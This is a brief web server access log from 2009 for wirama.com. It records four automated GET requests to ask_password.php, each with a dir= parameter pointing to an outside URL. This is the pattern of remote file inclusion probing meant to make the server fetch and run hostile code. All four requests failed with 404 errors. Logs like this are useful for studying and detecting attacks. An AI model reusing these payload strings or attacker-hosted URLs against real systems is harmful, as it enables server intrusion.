115.92.96.29 - - [03/Oct/2009:16:55:37 -0700] "GET /logs/ask_password.php?dir=http://www.telephone114.com/114gg/bruto/id1old? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.92.96.29 - - [03/Oct/2009:16:55:37 -0700] "GET /ask_password.php?dir=http://www.telephone114.com/114gg/bruto/id1old? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
115.92.96.29 - - [03/Oct/2009:16:55:38 -0700] "GET /logs/access_090330.log/ask_password.php?dir=http://www.telephone114.com/114gg/bruto/id1old? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.135.134.109 - - [03/Oct/2009:16:59:42 -0700] "GET /logs/ask_password.php?dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
